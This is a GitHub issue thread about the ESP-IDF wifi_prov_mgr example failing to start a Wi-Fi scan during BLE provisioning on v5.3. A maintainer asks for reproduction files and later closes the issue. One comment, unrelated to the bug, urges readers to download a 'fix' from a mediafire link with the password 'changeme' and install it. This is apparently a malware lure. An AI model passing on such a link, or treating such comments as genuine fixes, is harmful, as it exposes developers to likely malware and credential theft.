### ISSUE TITLE
E (18968) wifi_prov_mgr: Failed to start scan in wifi_prov_mgr example (IDFGH-13562)

### ISSUE THREAD

**Issue by robocircuits** [espressif/esp-idf#14451]
### Answers checklist.

- [X] I have read the documentation [ESP-IDF Programming Guide](https://docs.espressif.com/projects/esp-idf/en/latest/) and the issue is not addressed there.
- [X] I have updated my IDF branch (master or release) to the latest version and checked that the issue is present there.
- [X] I have searched the issue tracker for a similar issue and not found a similar issue.

### IDF version.

v5.3

### Espressif SoC revision.

ESP32

### Operating System used.

macOS

### How did you build your project?

Command line with idf.py

### If you are using Windows, please specify command line type.

None

### Development Kit.

ESP32

### Power Supply used.

USB

### What is the expected behavior?

It should show a list of Wi-Fi networks on the BLE provisioning app. but it shows
E (18968) wifi_prov_mgr: Failed to start scan

### What is the actual behavior?

E (18968) wifi_prov_mgr: Failed to start scan

### Steps to reproduce.

open wifi_prov_mgr 
choose ble 
upload

open ble prov app by espressifs

### Debug Logs.

```plain
E (18968) wifi_prov_mgr: Failed to start scan
```

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by robocircuits** [comment]
> Hello @robocircuits , I tried to reproduce your issue with given configuration, but I am unable to reproduce. We I scanned the QR. I got list of wifi networks. Can you please tell if any other changes are made?

It is still showing the same error. i checked another thread regarding the same issue with rainmaker code. they said this is the issue with v5.3.

**Comment by robocircuits** [comment]
![Uploading Screenshot 2024-08-31 at 3.48.20 PM.png…]()

**Comment by robocircuits** [comment]
and if i send wifi and password with other network option... this is the issue I am getting.
![Uploading Screenshot 2024-08-31 at 3.49.53 PM.png…]()

**Comment by robocircuits** [comment]
<img width="1008" alt="Screenshot 2024-08-31 at 3 48 20 PM" src="https://github.com/user-attachments/assets/80f27417-beb3-4ca1-b0c9-ecd224b3c1bc">

and if i send wifi and password with other network option... this is the issue I am getting.

<img width="803" alt="Screenshot 2024-08-31 at 3 49 53 PM" src="https://github.com/user-attachments/assets/44336515-9b61-4672-826f-b2527f81b55b">

**Comment by hrushikesh430** [comment]
@robocircuits is this a idf example or custom example. if esp-idf example, then can please share the patch file and sdkconfig  file. so that it will help me to reproduce the issue.

**Comment by hrushikesh430** [comment]
@robocircuits Closing this issue due to lack of response or any further updates. If you still face any issue please feel free to reopen.
